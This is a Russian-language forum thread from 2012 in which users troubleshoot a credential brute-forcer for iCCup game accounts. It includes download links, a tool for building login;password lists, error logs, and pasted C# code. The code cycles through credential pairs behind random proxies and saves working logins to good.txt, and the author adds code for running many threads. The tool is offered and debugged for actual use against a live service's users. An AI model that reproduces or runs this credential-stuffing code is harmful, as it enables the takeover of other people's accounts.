Вернуться   D3Scene.Ru Софт портал игр | Хаки | Проги | Статьи > Игровые платформы, клиенты > iCCup
Присоединяйся к нам

iCCup Лаунчер для игры в сети Battle.net на собственных серверах по StarCraft, WarCraft, Dota. Обсуждение, вопросы и ответы касающиеся iCCup`a в целом.



Ответ
 
Опции темы Опции просмотра
Старый 04.06.2012, 17:49   #16
Рядовой
 
Аватар для cod3x
 
Регистрация: 29.05.2012
Сообщений: 32
Репутация: 56
Автор По умолчанию

[Ссылки скрыты от гостей.]

На ютуб залить не смог, инет не позволяет
  Ответить с цитированием Наверх
Старый 04.06.2012, 18:12   #17
Рядовой
 
Аватар для Alexey1234
 
Регистрация: 30.04.2012
Адрес: Москва
Сообщений: 38
Репутация: 18
Отправить сообщение для Alexey1234 с помощью ICQ Отправить сообщение для Alexey1234 с помощью Skype™
По умолчанию

Цитата:
Сообщение от cod3x Посмотреть сообщение
[Ссылки скрыты от гостей.]

На ютуб залить не смог, инет не позволяет
сделал все тоже самое тока у меня не подбирается пароль, нажимаю старт, проходит секунда работа прекращается, при этом нет ни good ни bad ни error. делал все что сделал ты, и прокси у меня проверенный и сто процентов рабочий.

В чем проблема?
  Ответить с цитированием Наверх
Старый 04.06.2012, 18:18   #18
Старожил


 
Аватар для gg.Groove
 
Регистрация: 21.08.2010
Адрес: Almaty
Сообщений: 1,054
Репутация: 212
По умолчанию

Alexey1234, походу исключение в треде вылетает. Автор дай сурсы и прикрути логирование
__________________

[Ссылки скрыты от гостей.]
  Ответить с цитированием Наверх
Старый 04.06.2012, 18:22   #19
Рядовой
 
Аватар для Alexey1234
 
Регистрация: 30.04.2012
Адрес: Москва
Сообщений: 38
Репутация: 18
Отправить сообщение для Alexey1234 с помощью ICQ Отправить сообщение для Alexey1234 с помощью Skype™
По умолчанию

Цитата:
Сообщение от gg.Groove Посмотреть сообщение
Alexey1234, походу исключение в треде вылетает. Автор дай сурсы и прикрути логирование
как решить проблему?
  Ответить с цитированием Наверх
Старый 04.06.2012, 18:31   #20
Рядовой
 
Аватар для cod3x
 
Регистрация: 29.05.2012
Сообщений: 32
Репутация: 56
Автор По умолчанию

Цитата:
Сообщение от Alexey1234 Посмотреть сообщение
сделал все тоже самое тока у меня не подбирается пароль, нажимаю старт, проходит секунда работа прекращается, при этом нет ни good ни bad ни error. делал все что сделал ты, и прокси у меня проверенный и сто процентов рабочий.

В чем проблема?
У тебя Separator точно правильно указан? Покажи пример своего листа, на данный момент вижу только эту проблему, т.к. останавливает работу и ничего не выводит

Через 5 минут выложу версию с выводом Debug инфы

Добавлено через 12 минут
Версия с выводом Debug информации, запускать файлом debug.bat, или из консоли с ключом -debug, исключение и время исключения будет записано в файле debug.ini с программой

[Ссылки скрыты от гостей.]

Последний раз редактировалось cod3x; 04.06.2012 в 18:43. Причина: Добавлено сообщение
  Ответить с цитированием Наверх
Старый 04.06.2012, 18:49   #21
Местный
 
Аватар для Nikita2001
 
Регистрация: 22.06.2011
Сообщений: 81
Репутация: 1
По умолчанию

Вот программа для создания source-списка (логин;пароль).
[Ссылки скрыты от гостей.]
[Ссылки скрыты от гостей.]
__________________
Windows 7 x64
  Ответить с цитированием Наверх
Старый 04.06.2012, 19:12   #22
Рядовой
 
Аватар для Alexey1234
 
Регистрация: 30.04.2012
Адрес: Москва
Сообщений: 38
Репутация: 18
Отправить сообщение для Alexey1234 с помощью ICQ Отправить сообщение для Alexey1234 с помощью Skype™
По умолчанию

Цитата:
Сообщение от cod3x Посмотреть сообщение
У тебя Separator точно правильно указан? Покажи пример своего листа, на данный момент вижу только эту проблему, т.к. останавливает работу и ничего не выводит

Через 5 минут выложу версию с выводом Debug инфы

Добавлено через 12 минут
Версия с выводом Debug информации, запускать файлом debug.bat, или из консоли с ключом -debug, исключение и время исключения будет записано в файле debug.ini с программой

[Ссылки скрыты от гостей.]
04.06.2012 18:58:54 | Невозможно загрузить файл или сборку "ChilkatDotNet2, Version=9.2.1.0, Culture=neutral, PublicKeyToken=eb5fc1fc52ef09bd" или один из зависимых от них компонентов. Была сделана попытка загрузить программу, имеющую неверный формат.
04.06.2012 18:58:59 | Невозможно загрузить файл или сборку "ChilkatDotNet2, Version=9.2.1.0, Culture=neutral, PublicKeyToken=eb5fc1fc52ef09bd" или один из зависимых от них компонентов. Была сделана попытка загрузить программу, имеющую неверный формат.
04.06.2012 18:59:04 | Невозможно загрузить файл или сборку "ChilkatDotNet2, Version=9.2.1.0, Culture=neutral, PublicKeyToken=eb5fc1fc52ef09bd" или один из зависимых от них компонентов. Была сделана попытка загрузить программу, имеющую неверный формат.
04.06.2012 18:59:09 | Невозможно загрузить файл или сборку "ChilkatDotNet2, Version=9.2.1.0, Culture=neutral, PublicKeyToken=eb5fc1fc52ef09bd" или один из зависимых от них компонентов. Была сделана попытка загрузить программу, имеющую неверный формат.
04.06.2012 18:59:14 | Индекс за пределами диапазона. Индекс должен быть положительным числом, а его размер не должен превышать размер коллекции.
Имя параметра: index
  Ответить с цитированием Наверх
Старый 04.06.2012, 19:19   #23
Рядовой
 
Аватар для cod3x
 
Регистрация: 29.05.2012
Сообщений: 32
Репутация: 56
Автор По умолчанию

Цитата:
Сообщение от Alexey1234 Посмотреть сообщение
04.06.2012 18:58:54 | Невозможно загрузить файл или сборку "ChilkatDotNet2, Version=9.2.1.0, Culture=neutral, PublicKeyToken=eb5fc1fc52ef09bd" или один из зависимых от них компонентов. Была сделана попытка загрузить программу, имеющую неверный формат.
04.06.2012 18:58:59 | Невозможно загрузить файл или сборку "ChilkatDotNet2, Version=9.2.1.0, Culture=neutral, PublicKeyToken=eb5fc1fc52ef09bd" или один из зависимых от них компонентов. Была сделана попытка загрузить программу, имеющую неверный формат.
04.06.2012 18:59:04 | Невозможно загрузить файл или сборку "ChilkatDotNet2, Version=9.2.1.0, Culture=neutral, PublicKeyToken=eb5fc1fc52ef09bd" или один из зависимых от них компонентов. Была сделана попытка загрузить программу, имеющую неверный формат.
04.06.2012 18:59:09 | Невозможно загрузить файл или сборку "ChilkatDotNet2, Version=9.2.1.0, Culture=neutral, PublicKeyToken=eb5fc1fc52ef09bd" или один из зависимых от них компонентов. Была сделана попытка загрузить программу, имеющую неверный формат.
04.06.2012 18:59:14 | Индекс за пределами диапазона. Индекс должен быть положительным числом, а его размер не должен превышать размер коллекции.
Имя параметра: index
Версия .NET Framework'a 3.5? ChilkatDotNet2.dll не удалял из папки с программой?
  Ответить с цитированием Наверх
Старый 04.06.2012, 20:02   #24
Старожил


 
Аватар для gg.Groove
 
Регистрация: 21.08.2010
Адрес: Almaty
Сообщений: 1,054
Репутация: 212
По умолчанию

Добротный брут
public static void Brute()
{
while (Threads.n < iccup_brute.Globals.Source.Count)
{
checked { ++Threads.n; }
try
{
iccup iccup = new iccup();
int index = Threads.n;
string[] strArray = Strings.Split(Conversions.ToString(iccup_brute.Glo bals.Source[index]), Conversions.ToString(iccup_brute.Globals.bSettings .Separator), -1, CompareMethod.Binary);
iccup.UserName = (object) strArray[0];
iccup.Password = (object) strArray[1];
iccup.ProxyType = (object) iccup_brute.Globals.bSettings.ProxyType;
iccup.ProxyLine = RuntimeHelpers.GetObjectValue(iccup_brute.Globals. Proxy[iccup_brute.Globals.Random.Next(0, checked (iccup_brute.Globals.Proxy.Count - 1))]);
string Left = iccup.Login();
if (Operators.CompareString(Left, "Good", false) == 0)
{
iccup_brute.Globals.Good.Add(RuntimeHelpers.GetObj ectValue(iccup_brute.Globals.Source[index]));
File.WriteAllLines("good.txt", (string[]) iccup_brute.Globals.Good.ToArray(Type.GetType("Sys tem.String")));
}
else if (Operators.CompareString(Left, "Bad", false) == 0)
{
iccup_brute.Globals.Bad.Add(RuntimeHelpers.GetObje ctValue(iccup_brute.Globals.Source[index]));
if (iccup_brute.Globals.bSettings.SaveBad)
File.WriteAllLines("bad.txt", (string[]) iccup_brute.Globals.Bad.ToArray(Type.GetType("Syst em.String")));
}
else if (Operators.CompareString(Left, "Error", false) == 0)
{
iccup_brute.Globals.Errors.Add(RuntimeHelpers.GetO bjectValue(iccup_brute.Globals.Source[index]));
File.WriteAllLines("errors.txt", (string[]) iccup_brute.Globals.Errors.ToArray(Type.GetType("S ystem.String")));
}
iccup_brute.Globals.bSettings.PPS = iccup_brute.Globals.bSettings.PPS + 1.0;
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
finally
{
Thread.Sleep(iccup_brute.Globals.bSettings.Pause);
}
}
}

По идее ты должен убивать тред, не?
__________________

[Ссылки скрыты от гостей.]
  Ответить с цитированием Наверх
Старый 04.06.2012, 20:11   #25
Рядовой
 
Аватар для cod3x
 
Регистрация: 29.05.2012
Сообщений: 32
Репутация: 56
Автор По умолчанию

Цитата:
Сообщение от gg.Groove Посмотреть сообщение
Добротный брут
public static void Brute()
{
while (Threads.n < iccup_brute.Globals.Source.Count)
{
checked { ++Threads.n; }
try
{
iccup iccup = new iccup();
int index = Threads.n;
string[] strArray = Strings.Split(Conversions.ToString(iccup_brute.Glo bals.Source[index]), Conversions.ToString(iccup_brute.Globals.bSettings .Separator), -1, CompareMethod.Binary);
iccup.UserName = (object) strArray[0];
iccup.Password = (object) strArray[1];
iccup.ProxyType = (object) iccup_brute.Globals.bSettings.ProxyType;
iccup.ProxyLine = RuntimeHelpers.GetObjectValue(iccup_brute.Globals. Proxy[iccup_brute.Globals.Random.Next(0, checked (iccup_brute.Globals.Proxy.Count - 1))]);
string Left = iccup.Login();
if (Operators.CompareString(Left, "Good", false) == 0)
{
iccup_brute.Globals.Good.Add(RuntimeHelpers.GetObj ectValue(iccup_brute.Globals.Source[index]));
File.WriteAllLines("good.txt", (string[]) iccup_brute.Globals.Good.ToArray(Type.GetType("Sys tem.String")));
}
else if (Operators.CompareString(Left, "Bad", false) == 0)
{
iccup_brute.Globals.Bad.Add(RuntimeHelpers.GetObje ctValue(iccup_brute.Globals.Source[index]));
if (iccup_brute.Globals.bSettings.SaveBad)
File.WriteAllLines("bad.txt", (string[]) iccup_brute.Globals.Bad.ToArray(Type.GetType("Syst em.String")));
}
else if (Operators.CompareString(Left, "Error", false) == 0)
{
iccup_brute.Globals.Errors.Add(RuntimeHelpers.GetO bjectValue(iccup_brute.Globals.Source[index]));
File.WriteAllLines("errors.txt", (string[]) iccup_brute.Globals.Errors.ToArray(Type.GetType("S ystem.String")));
}
iccup_brute.Globals.bSettings.PPS = iccup_brute.Globals.bSettings.PPS + 1.0;
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
finally
{
Thread.Sleep(iccup_brute.Globals.bSettings.Pause);
}
}
}

По идее ты должен убивать тред, не?
О боги, мои глаза)) Потоки создаются и убиваются 2-умя функциями

PHP код:
Thread[] Threads = new Thread[500];
public 
int n = -1;
int Count;

public 
void CreateThreads(int number){
    
= -1;
    
Count number;

    for (
1<= Counti++) {
        
Threads[i] = new Thread(Brute);
        
Threads[i].IsBackground true;
        
Threads[i].Start();
    }

Неважно что происходит в процедуре Brute, по вызову завершающей функции все будет завершено грубым способом (аж вплоть до исключений, но там все отловлено).

PHP код:
public void AbortThreads(){
    for (
1<= Counti++) {
        if (
Threads[i].IsAlive) {
            
Threads[i].Abort();
        }
    }

3-я функция проверяет количество "живых" потоков
public int AliveThreads(){
int alive = 0;

for (i = 1; i <= Count; i++) {
if (Threads(i).IsAlive) {
alive += 1;
}
}

return alive;
}
  Ответить с цитированием Наверх
Старый 04.06.2012, 20:22   #26
Матерый

 
Аватар для Byter
 
Регистрация: 26.04.2009
Сообщений: 264
Репутация: 261
Отправить сообщение для Byter с помощью ICQ Отправить сообщение для Byter с помощью Skype™
По умолчанию

__________________
Кликните на для просмотра офф топика
  Ответить с цитированием Наверх
4 пользователя(ей) сказали cпасибо:
Alexey1234 (04.06.2012), Nartay (08.06.2012), RGrand (04.06.2012), UnDeaDRoCUser (04.06.2012)
Старый 04.06.2012, 20:28   #27
Местный
 
Аватар для Nikita2001
 
Регистрация: 22.06.2011
Сообщений: 81
Репутация: 1
По умолчанию

Цитата:
04.06.2012 20:14:25 | Невозможно загрузить файл или сборку "ChilkatDotNet2, Version=9.2.1.0, Culture=neutral, PublicKeyToken=eb5fc1fc52ef09bd" или один из зависимых от них компонентов. Была сделана попытка загрузить программу, имеющую неверный формат.
04.06.2012 20:14:25 | Невозможно загрузить файл или сборку "ChilkatDotNet2, Version=9.2.1.0, Culture=neutral, PublicKeyToken=eb5fc1fc52ef09bd" или один из зависимых от них компонентов. Была сделана попытка загрузить программу, имеющую неверный формат.
04.06.2012 20:14:25 | Невозможно загрузить файл или сборку "ChilkatDotNet2, Version=9.2.1.0, Culture=neutral, PublicKeyToken=eb5fc1fc52ef09bd" или один из зависимых от них компонентов. Была сделана попытка загрузить программу, имеющую неверный формат.
04.06.2012 20:14:25 | Невозможно загрузить файл или сборку "ChilkatDotNet2, Version=9.2.1.0, Culture=neutral, PublicKeyToken=eb5fc1fc52ef09bd" или один из зависимых от них компонентов. Была сделана попытка загрузить программу, имеющую неверный формат.
04.06.2012 20:14:25 | Индекс за пределами диапазона. Индекс должен быть положительным числом, а его размер не должен превышать размер коллекции.
Имя параметра: index
Тоже не работает. Windows 7 x64 - фреймворк есть. Помогите.
__________________
Windows 7 x64
  Ответить с цитированием Наверх
Старый 04.06.2012, 20:32   #28
Рядовой
 
Аватар для cod3x
 
Регистрация: 29.05.2012
Сообщений: 32
Репутация: 56
Автор По умолчанию

Цитата:
Сообщение от Nikita2001 Посмотреть сообщение
Тоже не работает. Windows 7 x64 - фреймворк есть. Помогите.
К сожалению скорее всего из-за x64, не я автор той дллки, так что хз что там могли наворотить
  Ответить с цитированием Наверх
Старый 04.06.2012, 20:55   #29
Рядовой
 
Аватар для Alexey1234
 
Регистрация: 30.04.2012
Адрес: Москва
Сообщений: 38
Репутация: 18
Отправить сообщение для Alexey1234 с помощью ICQ Отправить сообщение для Alexey1234 с помощью Skype™
По умолчанию

Цитата:
Сообщение от cod3x Посмотреть сообщение
К сожалению скорее всего из-за x64, не я автор той дллки, так что хз что там могли наворотить
все проверил, и к сожалению у меня тоже х64 (( пичаль
  Ответить с цитированием Наверх
Старый 04.06.2012, 21:31   #30
Старожил


 
Аватар для gg.Groove
 
Регистрация: 21.08.2010
Адрес: Almaty
Сообщений: 1,054
Репутация: 212
По умолчанию

Цитата:
Сообщение от cod3x Посмотреть сообщение
процедуре Brute
называют методами или функциями, по ООП .
Кстати чтобы Невозможно загрузить файл или сборку "ChilkatDotNet2, Version=9.2.1.0, Culture=neutral, PublicKeyToken=eb5fc1fc52ef09bd" или один из зависимых от них компонентов. Была сделана попытка загрузить программу, имеющую неверный формат. не вылетала надо указать архитектуру
__________________

[Ссылки скрыты от гостей.]
  Ответить с цитированием Наверх
Ответ


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 
Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход


Powered by vBulletin
Copyright © 2017 vBulletin Solutions, Inc.
Перевод: zCarot | Дизайн: G-A | Верстка: OldEr
Текущее время: 17:42. Часовой пояс GMT +4.